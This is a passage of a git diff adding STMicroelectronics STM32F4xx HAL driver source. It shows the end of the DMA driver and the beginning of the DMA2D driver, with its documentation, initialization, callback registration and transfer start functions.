@param SrcAddress The source memory Buffer address + * @param DstAddress The destination memory Buffer address + * @param DataLength The length of data to be transferred from source to destination + * @retval HAL status + */ +static void DMA_SetConfig(DMA_HandleTypeDef *hdma, uint32_t SrcAddress, uint32_t DstAddress, uint32_t DataLength) +{ + /* Clear DBM bit */ + hdma->Instance->CR &= (uint32_t)(~DMA_SxCR_DBM); + + /* Configure DMA Stream data length */ + hdma->Instance->NDTR = DataLength; + + /* Memory to Peripheral */ + if((hdma->Init.Direction) == DMA_MEMORY_TO_PERIPH) + { + /* Configure DMA Stream destination address */ + hdma->Instance->PAR = DstAddress; + + /* Configure DMA Stream source address */ + hdma->Instance->M0AR = SrcAddress; + } + /* Peripheral to Memory */ + else + { + /* Configure DMA Stream source address */ + hdma->Instance->PAR = SrcAddress; + + /* Configure DMA Stream destination address */ + hdma->Instance->M0AR = DstAddress; + } +} + +/** + * @brief Returns the DMA Stream base address depending on stream number + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA Stream. + * @retval Stream base address + */ +static uint32_t DMA_CalcBaseAndBitshift(DMA_HandleTypeDef *hdma) +{ + uint32_t stream_number = (((uint32_t)hdma->Instance & 0xFFU) - 16U) / 24U; + + /* lookup table for necessary bitshift of flags within status registers */ + static const uint8_t flagBitshiftOffset[8U] = {0U, 6U, 16U, 22U, 0U, 6U, 16U, 22U}; + hdma->StreamIndex = flagBitshiftOffset[stream_number]; + + if (stream_number > 3U) + { + /* return pointer to HISR and HIFCR */ + hdma->StreamBaseAddress = (((uint32_t)hdma->Instance & (uint32_t)(~0x3FFU)) + 4U); + } + else + { + /* return pointer to LISR and LIFCR */ + hdma->StreamBaseAddress = ((uint32_t)hdma->Instance & (uint32_t)(~0x3FFU)); + } + + return hdma->StreamBaseAddress; +} + +/** + * @brief Check compatibility between FIFO threshold level and size of the memory burst + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA Stream. + * @retval HAL status + */ +static HAL_StatusTypeDef DMA_CheckFifoParam(DMA_HandleTypeDef *hdma) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tmp = hdma->Init.FIFOThreshold; + + /* Memory Data size equal to Byte */ + if(hdma->Init.MemDataAlignment == DMA_MDATAALIGN_BYTE) + { + switch (tmp) + { + case DMA_FIFO_THRESHOLD_1QUARTERFULL: + case DMA_FIFO_THRESHOLD_3QUARTERSFULL: + if ((hdma->Init.MemBurst & DMA_SxCR_MBURST_1) == DMA_SxCR_MBURST_1) + { + status = HAL_ERROR; + } + break; + case DMA_FIFO_THRESHOLD_HALFFULL: + if (hdma->Init.MemBurst == DMA_MBURST_INC16) + { + status = HAL_ERROR; + } + break; + case DMA_FIFO_THRESHOLD_FULL: + break; + default: + break; + } + } + + /* Memory Data size equal to Half-Word */ + else if (hdma->Init.MemDataAlignment == DMA_MDATAALIGN_HALFWORD) + { + switch (tmp) + { + case DMA_FIFO_THRESHOLD_1QUARTERFULL: + case DMA_FIFO_THRESHOLD_3QUARTERSFULL: + status = HAL_ERROR; + break; + case DMA_FIFO_THRESHOLD_HALFFULL: + if ((hdma->Init.MemBurst & DMA_SxCR_MBURST_1) == DMA_SxCR_MBURST_1) + { + status = HAL_ERROR; + } + break; + case DMA_FIFO_THRESHOLD_FULL: + if (hdma->Init.MemBurst == DMA_MBURST_INC16) + { + status = HAL_ERROR; + } + break; + default: + break; + } + } + + /* Memory Data size equal to Word */ + else + { + switch (tmp) + { + case DMA_FIFO_THRESHOLD_1QUARTERFULL: + case DMA_FIFO_THRESHOLD_HALFFULL: + case DMA_FIFO_THRESHOLD_3QUARTERSFULL: + status = HAL_ERROR; + break; + case DMA_FIFO_THRESHOLD_FULL: + if ((hdma->Init.MemBurst & DMA_SxCR_MBURST_1) == DMA_SxCR_MBURST_1) + { + status = HAL_ERROR; + } + break; + default: + break; + } + } + + return status; +} + +/** + * @} + */ + +#endif /* HAL_DMA_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dma2d.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dma2d.c new file mode 100644 index 000000000..f3582b643 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dma2d.c @@ -0,0 +1,2128 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_dma2d.c + * @author MCD Application Team + * @brief DMA2D HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the DMA2D peripheral: + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral Control functions + * + Peripheral State and Errors functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + (#) Program the required configuration through the following parameters: + the transfer mode, the output color mode and the output offset using + HAL_DMA2D_Init() function. + + (#) Program the required configuration through the following parameters: + the input color mode, the input color, the input alpha value, the alpha mode, + the red/blue swap mode, the inverted alpha mode and the input offset using + HAL_DMA2D_ConfigLayer() function for foreground or/and background layer. + + *** Polling mode IO operation *** + ================================= + [..] + (#) Configure pdata parameter (explained hereafter), destination and data length + and enable the transfer using HAL_DMA2D_Start(). + (#) Wait for end of transfer using HAL_DMA2D_PollForTransfer(), at this stage + user can specify the value of timeout according to his end application. + + *** Interrupt mode IO operation *** + =================================== + [..] + (#) Configure pdata parameter, destination and data length and enable + the transfer using HAL_DMA2D_Start_IT(). + (#) Use HAL_DMA2D_IRQHandler() called under DMA2D_IRQHandler() interrupt subroutine. + (#) At the end of data transfer HAL_DMA2D_IRQHandler() function is executed and user can + add his own function by customization of function pointer XferCpltCallback (member + of DMA2D handle structure). + (#) In case of error, the HAL_DMA2D_IRQHandler() function calls the callback + XferErrorCallback. + + -@- In Register-to-Memory transfer mode, pdata parameter is the register + color, in Memory-to-memory or Memory-to-Memory with pixel format + conversion pdata is the source address. + + -@- Configure the foreground source address, the background source address, + the destination and data length then Enable the transfer using + HAL_DMA2D_BlendingStart() in polling mode and HAL_DMA2D_BlendingStart_IT() + in interrupt mode. + + -@- HAL_DMA2D_BlendingStart() and HAL_DMA2D_BlendingStart_IT() functions + are used if the memory to memory with blending transfer mode is selected. + + (#) Optionally, configure and enable the CLUT using HAL_DMA2D_CLUTLoad() in polling + mode or HAL_DMA2D_CLUTLoad_IT() in interrupt mode. + + (#) Optionally, configure the line watermark in using the API HAL_DMA2D_ProgramLineEvent(). + + (#) Optionally, configure the dead time value in the AHB clock cycle inserted between two + consecutive accesses on the AHB master port in using the API HAL_DMA2D_ConfigDeadTime() + and enable/disable the functionality with the APIs HAL_DMA2D_EnableDeadTime() or + HAL_DMA2D_DisableDeadTime(). + + (#) The transfer can be suspended, resumed and aborted using the following + functions: HAL_DMA2D_Suspend(), HAL_DMA2D_Resume(), HAL_DMA2D_Abort(). + + (#) The CLUT loading can be suspended, resumed and aborted using the following + functions: HAL_DMA2D_CLUTLoading_Suspend(), HAL_DMA2D_CLUTLoading_Resume(), + HAL_DMA2D_CLUTLoading_Abort(). + + (#) To control the DMA2D state, use the following function: HAL_DMA2D_GetState(). + + (#) To read the DMA2D error code, use the following function: HAL_DMA2D_GetError(). + + *** DMA2D HAL driver macros list *** + ============================================= + [..] + Below the list of most used macros in DMA2D HAL driver : + + (+) __HAL_DMA2D_ENABLE: Enable the DMA2D peripheral. + (+) __HAL_DMA2D_GET_FLAG: Get the DMA2D pending flags. + (+) __HAL_DMA2D_CLEAR_FLAG: Clear the DMA2D pending flags. + (+) __HAL_DMA2D_ENABLE_IT: Enable the specified DMA2D interrupts. + (+) __HAL_DMA2D_DISABLE_IT: Disable the specified DMA2D interrupts. + (+) __HAL_DMA2D_GET_IT_SOURCE: Check whether the specified DMA2D interrupt is enabled or not. + + *** Callback registration *** + =================================== + [..] + (#) The compilation define USE_HAL_DMA2D_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + Use function HAL_DMA2D_RegisterCallback() to register a user callback. + + (#) Function HAL_DMA2D_RegisterCallback() allows to register following callbacks: + (+) XferCpltCallback : callback for transfer complete. + (+) XferErrorCallback : callback for transfer error. + (+) LineEventCallback : callback for line event. + (+) CLUTLoadingCpltCallback : callback for CLUT loading completion. + (+) MspInitCallback : DMA2D MspInit. + (+) MspDeInitCallback : DMA2D MspDeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + (#) Use function HAL_DMA2D_UnRegisterCallback() to reset a callback to the default + weak (surcharged) function. + HAL_DMA2D_UnRegisterCallback() takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset following callbacks: + (+) XferCpltCallback : callback for transfer complete. + (+) XferErrorCallback : callback for transfer error. + (+) LineEventCallback : callback for line event. + (+) CLUTLoadingCpltCallback : callback for CLUT loading completion. + (+) MspInitCallback : DMA2D MspInit. + (+) MspDeInitCallback : DMA2D MspDeInit. + + (#) By default, after the HAL_DMA2D_Init and if the state is HAL_DMA2D_STATE_RESET + all callbacks are reset to the corresponding legacy weak (surcharged) functions: + examples HAL_DMA2D_LineEventCallback(), HAL_DMA2D_CLUTLoadingCpltCallback() + Exception done for MspInit and MspDeInit callbacks that are respectively + reset to the legacy weak (surcharged) functions in the HAL_DMA2D_Init + and HAL_DMA2D_DeInit only when these callbacks are null (not registered beforehand) + If not, MspInit or MspDeInit are not null, the HAL_DMA2D_Init and HAL_DMA2D_DeInit + keep and use the user MspInit/MspDeInit callbacks (registered beforehand). + + Exception as well for Transfer Completion and Transfer Error callbacks that are not defined + as weak (surcharged) functions. They must be defined by the user to be resorted to. + + Callbacks can be registered/unregistered in READY state only. + Exception done for MspInit/MspDeInit callbacks that can be registered/unregistered + in READY or RESET state, thus registered (user) MspInit/DeInit callbacks can be used + during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using HAL_DMA2D_RegisterCallback before calling HAL_DMA2D_DeInit + or HAL_DMA2D_Init function. + + When The compilation define USE_HAL_DMA2D_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registering feature is not available + and weak (surcharged) callbacks are used. + + [..] + (@) You can refer to the DMA2D HAL driver header file for more useful macros + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +#ifdef HAL_DMA2D_MODULE_ENABLED +#if defined (DMA2D) + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup DMA2D DMA2D + * @brief DMA2D HAL module driver + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @defgroup DMA2D_Private_Constants DMA2D Private Constants + * @{ + */ + +/** @defgroup DMA2D_TimeOut DMA2D Time Out + * @{ + */ +#define DMA2D_TIMEOUT_ABORT (1000U) /*!< 1s */ +#define DMA2D_TIMEOUT_SUSPEND (1000U) /*!< 1s */ +/** + * @} + */ + +/** + * @} + */ + +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/** @addtogroup DMA2D_Private_Functions DMA2D Private Functions + * @{ + */ +static void DMA2D_SetConfig(DMA2D_HandleTypeDef *hdma2d, uint32_t pdata, uint32_t DstAddress, uint32_t Width, + uint32_t Height); +/** + * @} + */ + +/* Private functions ---------------------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ +/** @defgroup DMA2D_Exported_Functions DMA2D Exported Functions + * @{ + */ + +/** @defgroup DMA2D_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and Configuration functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Initialize and configure the DMA2D + (+) De-initialize the DMA2D + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the DMA2D according to the specified + * parameters in the DMA2D_InitTypeDef and create the associated handle. + * @param hdma2d pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_Init(DMA2D_HandleTypeDef *hdma2d) +{ + /* Check the DMA2D peripheral state */ + if (hdma2d == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_DMA2D_ALL_INSTANCE(hdma2d->Instance)); + assert_param(IS_DMA2D_MODE(hdma2d->Init.Mode)); + assert_param(IS_DMA2D_CMODE(hdma2d->Init.ColorMode)); + assert_param(IS_DMA2D_OFFSET(hdma2d->Init.OutputOffset)); + +#if (USE_HAL_DMA2D_REGISTER_CALLBACKS == 1) + if (hdma2d->State == HAL_DMA2D_STATE_RESET) + { + /* Reset Callback pointers in HAL_DMA2D_STATE_RESET only */ + hdma2d->LineEventCallback = HAL_DMA2D_LineEventCallback; + hdma2d->CLUTLoadingCpltCallback = HAL_DMA2D_CLUTLoadingCpltCallback; + if (hdma2d->MspInitCallback == NULL) + { + hdma2d->MspInitCallback = HAL_DMA2D_MspInit; + } + + /* Init the low level hardware */ + hdma2d->MspInitCallback(hdma2d); + } +#else + if (hdma2d->State == HAL_DMA2D_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hdma2d->Lock = HAL_UNLOCKED; + /* Init the low level hardware */ + HAL_DMA2D_MspInit(hdma2d); + } +#endif /* (USE_HAL_DMA2D_REGISTER_CALLBACKS) */ + + /* Change DMA2D peripheral state */ + hdma2d->State = HAL_DMA2D_STATE_BUSY; + + /* DMA2D CR register configuration -------------------------------------------*/ + MODIFY_REG(hdma2d->Instance->CR, DMA2D_CR_MODE, hdma2d->Init.Mode); + + /* DMA2D OPFCCR register configuration ---------------------------------------*/ + MODIFY_REG(hdma2d->Instance->OPFCCR, DMA2D_OPFCCR_CM, hdma2d->Init.ColorMode); + + /* DMA2D OOR register configuration ------------------------------------------*/ + MODIFY_REG(hdma2d->Instance->OOR, DMA2D_OOR_LO, hdma2d->Init.OutputOffset); + + + /* Update error code */ + hdma2d->ErrorCode = HAL_DMA2D_ERROR_NONE; + + /* Initialize the DMA2D state*/ + hdma2d->State = HAL_DMA2D_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Deinitializes the DMA2D peripheral registers to their default reset + * values. + * @param hdma2d pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @retval None + */ + +HAL_StatusTypeDef HAL_DMA2D_DeInit(DMA2D_HandleTypeDef *hdma2d) +{ + + /* Check the DMA2D peripheral state */ + if (hdma2d == NULL) + { + return HAL_ERROR; + } + + /* Before aborting any DMA2D transfer or CLUT loading, check + first whether or not DMA2D clock is enabled */ + if (__HAL_RCC_DMA2D_IS_CLK_ENABLED()) + { + /* Abort DMA2D transfer if any */ + if ((hdma2d->Instance->CR & DMA2D_CR_START) == DMA2D_CR_START) + { + if (HAL_DMA2D_Abort(hdma2d) != HAL_OK) + { + /* Issue when aborting DMA2D transfer */ + return HAL_ERROR; + } + } + else + { + /* Abort background CLUT loading if any */ + if ((hdma2d->Instance->BGPFCCR & DMA2D_BGPFCCR_START) == DMA2D_BGPFCCR_START) + { + if (HAL_DMA2D_CLUTLoading_Abort(hdma2d, 0U) != HAL_OK) + { + /* Issue when aborting background CLUT loading */ + return HAL_ERROR; + } + } + else + { + /* Abort foreground CLUT loading if any */ + if ((hdma2d->Instance->FGPFCCR & DMA2D_FGPFCCR_START) == DMA2D_FGPFCCR_START) + { + if (HAL_DMA2D_CLUTLoading_Abort(hdma2d, 1U) != HAL_OK) + { + /* Issue when aborting foreground CLUT loading */ + return HAL_ERROR; + } + } + } + } + } + + /* Reset DMA2D control registers*/ + hdma2d->Instance->CR = 0U; + hdma2d->Instance->IFCR = 0x3FU; + hdma2d->Instance->FGOR = 0U; + hdma2d->Instance->BGOR = 0U; + hdma2d->Instance->FGPFCCR = 0U; + hdma2d->Instance->BGPFCCR = 0U; + hdma2d->Instance->OPFCCR = 0U; + +#if (USE_HAL_DMA2D_REGISTER_CALLBACKS == 1) + + if (hdma2d->MspDeInitCallback == NULL) + { + hdma2d->MspDeInitCallback = HAL_DMA2D_MspDeInit; + } + + /* DeInit the low level hardware */ + hdma2d->MspDeInitCallback(hdma2d); + +#else + /* Carry on with de-initialization of low level hardware */ + HAL_DMA2D_MspDeInit(hdma2d); +#endif /* (USE_HAL_DMA2D_REGISTER_CALLBACKS) */ + + /* Update error code */ + hdma2d->ErrorCode = HAL_DMA2D_ERROR_NONE; + + /* Initialize the DMA2D state*/ + hdma2d->State = HAL_DMA2D_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hdma2d); + + return HAL_OK; +} + +/** + * @brief Initializes the DMA2D MSP. + * @param hdma2d pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @retval None + */ +__weak void HAL_DMA2D_MspInit(DMA2D_HandleTypeDef *hdma2d) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdma2d); + + /* NOTE : This function should not be modified; when the callback is needed, + the HAL_DMA2D_MspInit can be implemented in the user file. + */ +} + +/** + * @brief DeInitializes the DMA2D MSP. + * @param hdma2d pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @retval None + */ +__weak void HAL_DMA2D_MspDeInit(DMA2D_HandleTypeDef *hdma2d) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdma2d); + + /* NOTE : This function should not be modified; when the callback is needed, + the HAL_DMA2D_MspDeInit can be implemented in the user file. + */ +} + +#if (USE_HAL_DMA2D_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User DMA2D Callback + * To be used instead of the weak (surcharged) predefined callback + * @param hdma2d DMA2D handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_DMA2D_TRANSFERCOMPLETE_CB_ID DMA2D transfer complete Callback ID + * @arg @ref HAL_DMA2D_TRANSFERERROR_CB_ID DMA2D transfer error Callback ID + * @arg @ref HAL_DMA2D_LINEEVENT_CB_ID DMA2D line event Callback ID + * @arg @ref HAL_DMA2D_CLUTLOADINGCPLT_CB_ID DMA2D CLUT loading completion Callback ID + * @arg @ref HAL_DMA2D_MSPINIT_CB_ID DMA2D MspInit callback ID + * @arg @ref HAL_DMA2D_MSPDEINIT_CB_ID DMA2D MspDeInit callback ID + * @param pCallback pointer to the Callback function + * @note No weak predefined callbacks are defined for HAL_DMA2D_TRANSFERCOMPLETE_CB_ID or HAL_DMA2D_TRANSFERERROR_CB_ID + * @retval status + */ +HAL_StatusTypeDef HAL_DMA2D_RegisterCallback(DMA2D_HandleTypeDef *hdma2d, HAL_DMA2D_CallbackIDTypeDef CallbackID, + pDMA2D_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_INVALID_CALLBACK; + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hdma2d); + + if (HAL_DMA2D_STATE_READY == hdma2d->State) + { + switch (CallbackID) + { + case HAL_DMA2D_TRANSFERCOMPLETE_CB_ID : + hdma2d->XferCpltCallback = pCallback; + break; + + case HAL_DMA2D_TRANSFERERROR_CB_ID : + hdma2d->XferErrorCallback = pCallback; + break; + + case HAL_DMA2D_LINEEVENT_CB_ID : + hdma2d->LineEventCallback = pCallback; + break; + + case HAL_DMA2D_CLUTLOADINGCPLT_CB_ID : + hdma2d->CLUTLoadingCpltCallback = pCallback; + break; + + case HAL_DMA2D_MSPINIT_CB_ID : + hdma2d->MspInitCallback = pCallback; + break; + + case HAL_DMA2D_MSPDEINIT_CB_ID : + hdma2d->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_DMA2D_STATE_RESET == hdma2d->State) + { + switch (CallbackID) + { + case HAL_DMA2D_MSPINIT_CB_ID : + hdma2d->MspInitCallback = pCallback; + break; + + case HAL_DMA2D_MSPDEINIT_CB_ID : + hdma2d->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hdma2d); + return status; +} + +/** + * @brief Unregister a DMA2D Callback + * DMA2D Callback is redirected to the weak (surcharged) predefined callback + * @param hdma2d DMA2D handle + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_DMA2D_TRANSFERCOMPLETE_CB_ID DMA2D transfer complete Callback ID + * @arg @ref HAL_DMA2D_TRANSFERERROR_CB_ID DMA2D transfer error Callback ID + * @arg @ref HAL_DMA2D_LINEEVENT_CB_ID DMA2D line event Callback ID + * @arg @ref HAL_DMA2D_CLUTLOADINGCPLT_CB_ID DMA2D CLUT loading completion Callback ID + * @arg @ref HAL_DMA2D_MSPINIT_CB_ID DMA2D MspInit callback ID + * @arg @ref HAL_DMA2D_MSPDEINIT_CB_ID DMA2D MspDeInit callback ID + * @note No weak predefined callbacks are defined for HAL_DMA2D_TRANSFERCOMPLETE_CB_ID or HAL_DMA2D_TRANSFERERROR_CB_ID + * @retval status + */ +HAL_StatusTypeDef HAL_DMA2D_UnRegisterCallback(DMA2D_HandleTypeDef *hdma2d, HAL_DMA2D_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hdma2d); + + if (HAL_DMA2D_STATE_READY == hdma2d->State) + { + switch (CallbackID) + { + case HAL_DMA2D_TRANSFERCOMPLETE_CB_ID : + hdma2d->XferCpltCallback = NULL; + break; + + case HAL_DMA2D_TRANSFERERROR_CB_ID : + hdma2d->XferErrorCallback = NULL; + break; + + case HAL_DMA2D_LINEEVENT_CB_ID : + hdma2d->LineEventCallback = HAL_DMA2D_LineEventCallback; + break; + + case HAL_DMA2D_CLUTLOADINGCPLT_CB_ID : + hdma2d->CLUTLoadingCpltCallback = HAL_DMA2D_CLUTLoadingCpltCallback; + break; + + case HAL_DMA2D_MSPINIT_CB_ID : + hdma2d->MspInitCallback = HAL_DMA2D_MspInit; /* Legacy weak (surcharged) Msp Init */ + break; + + case HAL_DMA2D_MSPDEINIT_CB_ID : + hdma2d->MspDeInitCallback = HAL_DMA2D_MspDeInit; /* Legacy weak (surcharged) Msp DeInit */ + break; + + default : + /* Update the error code */ + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_DMA2D_STATE_RESET == hdma2d->State) + { + switch (CallbackID) + { + case HAL_DMA2D_MSPINIT_CB_ID : + hdma2d->MspInitCallback = HAL_DMA2D_MspInit; /* Legacy weak (surcharged) Msp Init */ + break; + + case HAL_DMA2D_MSPDEINIT_CB_ID : + hdma2d->MspDeInitCallback = HAL_DMA2D_MspDeInit; /* Legacy weak (surcharged) Msp DeInit */ + break; + + default : + /* Update the error code */ + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hdma2d); + return status; +} +#endif /* USE_HAL_DMA2D_REGISTER_CALLBACKS */ + +/** + * @} + */ + + +/** @defgroup DMA2D_Exported_Functions_Group2 IO operation functions + * @brief IO operation functions + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Configure the pdata, destination address and data size then + start the DMA2D transfer. + (+) Configure the source for foreground and background, destination address + and data size then start a MultiBuffer DMA2D transfer. + (+) Configure the pdata, destination address and data size then + start the DMA2D transfer with interrupt. + (+) Configure the source for foreground and background, destination address + and data size then start a MultiBuffer DMA2D transfer with interrupt. + (+) Abort DMA2D transfer. + (+) Suspend DMA2D transfer. + (+) Resume DMA2D transfer. + (+) Enable CLUT transfer. + (+) Configure CLUT loading then start transfer in polling mode. + (+) Configure CLUT loading then start transfer in interrupt mode. + (+) Abort DMA2D CLUT loading. + (+) Suspend DMA2D CLUT loading. + (+) Resume DMA2D CLUT loading. + (+) Poll for transfer complete. + (+) handle DMA2D interrupt request. + (+) Transfer watermark callback. + (+) CLUT Transfer Complete callback. + + +@endverbatim + * @{ + */ + +/** + * @brief Start the DMA2D Transfer. + * @param hdma2d Pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @param pdata Configure the source memory Buffer address if + * Memory-to-Memory or Memory-to-Memory with pixel format + * conversion mode is selected, or configure + * the color value if Register-to-Memory mode is selected. + * @param DstAddress The destination memory Buffer address. + * @param Width The width of data to be transferred from source + * to destination (expressed in number of pixels per line). + * @param Height The height of data to be transferred from source to destination (expressed in number of lines). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_Start(DMA2D_HandleTypeDef *hdma2d, uint32_t pdata, uint32_t DstAddress, uint32_t Width, + uint32_t Height) +{ + /* Check the parameters */ + assert_param(IS_DMA2D_LINE(Height)); + assert_param(IS_DMA2D_PIXEL(Width)); + + /* Process locked */ + __HAL_LOCK(hdma2d); + + /* Change DMA2D peripheral state */ + hdma2d->State = HAL_DMA2D_STATE_BUSY; + + /* Configure the source, destination address and the data size */ + DMA2D_SetConfig(hdma2d, pdata, DstAddress, Width, Height); + + /* Enable the Peripheral */ + __HAL_DMA2D_ENABLE(hdma2d); + + return HAL_OK; +} + +/** + * @brief Start the DMA2D Transfer with interrupt enabled. + * @param hdma2d Pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @param pdata Configure the source memory Buffer address if + * the Memory-to-Memory or Memory-to-Memory with pixel format + * conversion mode is selected, or configure + * the color value if Register-to-Memory mode is selected. + * @param DstAddress The destination memory Buffer address. + * @param Width The width of data to be transferred from source + * to destination (expressed in number of pixels per line). + * @param Height The height of data to be transferred from source to destination (expressed in number of lines). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_Start_IT(DMA2D_HandleTypeDef *hdma2d, uint32_t pdata, uint32_t DstAddress, uint32_t Width, + uint32_t Height) +{ + /* Check the parameters */ + assert_param(IS_DMA2D_LINE(Height)); + assert_param(IS_DMA2D_PIXEL(Width)); + + /* Process locked */ + __HAL_LOCK(hdma2d); + + /* Change DMA2D peripheral state */ + hdma2d->State = HAL_DMA2D_STATE_BUSY; + + /* Configure the source, destination address and the data size */ + DMA2D_SetConfig(hdma2d, pdata, DstAddress, Width, Height); + + /* Enable the transfer complete, transfer error and configuration error interrupts */ + __HAL_DMA2D_ENABLE_IT(hdma2d, DMA2D_IT_TC | DMA2D_IT_TE | DMA2D_IT_CE); + + /* Enable the Peripheral */ + __HAL_DMA2D_ENABLE(hdma2d); + + return HAL_OK; +} + +/** + * @brief Start the multi-source DMA2D Transfer. + * @param hdma2d Pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @param SrcAddress1 The source memory Buffer address for the foreground layer. + * @param SrcAddress2 The source memory Buffer address for the background layer. + * @param DstAddress The destination memory Buffer address. + * @param Width The width of data to be transferred from source + * to destination (expressed in number of pixels per line). + * @param Height The height of data to be transferred from source to destination (expressed in number of lines). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_BlendingStart(DMA2D_HandleTypeDef *hdma2d, uint32_t SrcAddress1, uint32_t SrcAddress2, + uint32_t DstAddress, uint32_t Width, uint32_t Height) +{ + /* Check the parameters */ + assert_param(IS_DMA2D_LINE(Height)); + assert_param(IS_DMA2D_PIXEL(Width)); + + /* Process locked */ + __HAL_LOCK(hdma2d); + + /* Change DMA2D peripheral state */ + hdma2d->State = HAL_DMA2D_STATE_BUSY; + + /* Configure DMA2D Stream source2 address */ + WRITE_REG(hdma2d->Instance->BGMAR, SrcAddress2); + + /* Configure the source, destination address and the data size */ + DMA2D_SetConfig(hdma2d, SrcAddress1, DstAddress, Width, Height); + + /* Enable the Peripheral */ + __HAL_DMA2D_ENABLE(hdma2d); + + return HAL_OK; +} + +/** + * @brief Start the multi-source DMA2D Transfer with interrupt enabled. + * @param hdma2d Pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @param SrcAddress1 The source memory Buffer address for the foreground layer. + * @param SrcAddress2 The source memory Buffer address for the background layer. + * @param DstAddress The destination memory Buffer address. + * @param Width The width of data to be transferred from source + * to destination (expressed in number of pixels per line). + * @param Height The height of data to be transferred from source to destination (expressed in number of lines). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_BlendingStart_IT(DMA2D_HandleTypeDef *hdma2d, uint32_t SrcAddress1, uint32_t SrcAddress2, + uint32_t DstAddress, uint32_t Width, uint32_t Height) +{ + /* Check the parameters */ + assert_param(IS_DMA2D_LINE(Height)); + assert_param(IS_DMA2D_PIXEL(Width)); + + /* Process locked */ + __HAL_LOCK(hdma2d); + + /* Change DMA2D peripheral state */ + hdma2d->State = HAL_DMA2D_STATE_BUSY; + + /* Configure DMA2D Stream source2 address 